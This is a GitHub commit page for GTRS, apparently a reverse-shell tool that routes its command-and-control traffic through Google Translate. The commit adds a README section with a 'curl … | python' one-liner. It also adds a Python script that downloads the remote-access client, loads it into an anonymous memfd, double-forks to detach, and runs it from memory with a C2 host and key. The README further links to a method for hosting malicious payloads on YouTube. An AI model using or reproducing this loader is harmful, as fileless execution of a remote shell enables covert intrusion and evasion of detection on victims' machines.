Skip to content

Commit

Permalink
In memory execution
Browse files Browse the repository at this point in the history
  • Loading branch information
@mthbernardes
mthbernardes committed Dec 25, 2018
1 parent 36bc380 commit 3718503
Show file tree
Hide file tree
Showing 2 changed files with 35 additions and 2 deletions.
11 changes: 9 additions & 2 deletions README.md
View file
Expand Up @@ -26,11 +26,18 @@ bash client.sh www.c2server.ml e294a11e-bb6f-49ed-b03a-9ec42be55062
Now you have an interactive shell using named pipe files, **YES** you can `cd` into directories.

# Client Go
You first need to download the binarie or compile it, then the processe is equal of the bash client,
You first need to [download](https://github.com/mthbernardes/GTRS/releases) the binary or compile it, then the process is equal of the bash client,
```bash
./client_Linux www.c2server.ml e294a11e-bb6f-49ed-b03a-9ec42be55062
```
With this client you have the hability to run it on Linux, Mac and Windows, but the client do not have a interactive shell yet.
With this client you have the ability to run it on Linux, Mac and Windows, but the client do not have a interactive shell yet.

# ELF in-memory execution (Linux Only)
After reading this [blogpost](https://blog.fbkcs.ru/en/elf-in-memory-execution/), I made a simple adaption to execute the GTRS in memory, just edit the host and key in the script [inmemory-linux.py](utils/inmemory-linux.py), then host it on a server an curl it.
```bash
curl https://yourserver.ml/inmemory-linux.py | python
```
Or you can host the script using the [youtube](https://mthbernardes.github.io/rce/2018/12/14/hosting-malicious-payloads-on-youtube.html) approach.

# Poc
[![CODE_IS_CHEAP_SHOW_ME_THE_DEMO](http://img.youtube.com/vi/02CFsE0k96E/0.jpg)](http://www.youtube.com/watch?v=02CFsE0k96E)
Expand Down
26 changes: 26 additions & 0 deletions utils/inmemory-linux.py
View file
@@ -0,0 +1,26 @@
#!/usr/bin/python

# This code came from this awesome blogpost, https://blog.fbkcs.ru/en/elf-in-memory-execution/

import os
import urllib
import ctypes

url = "https://github.com/mthbernardes/GTRS/releases/download/v1/client_Linux"
binary = urllib.urlopen(url).read()

fd = ctypes.CDLL(None).syscall(319,"",1)
final_fd = open('/proc/self/fd/'+str(fd),'wb')
final_fd.write(binary)
final_fd.close()

fork1 = os.fork()
if 0 != fork1: os._exit(0)

ctypes.CDLL(None).syscall(112)

fork2 = os.fork()
if 0 != fork2: os._exit(0)

os.execl('/proc/self/fd/'+str(fd),'echo','youserver.ml','yourtokengoeshere')

0 comments on commit 3718503

Please sign in to comment.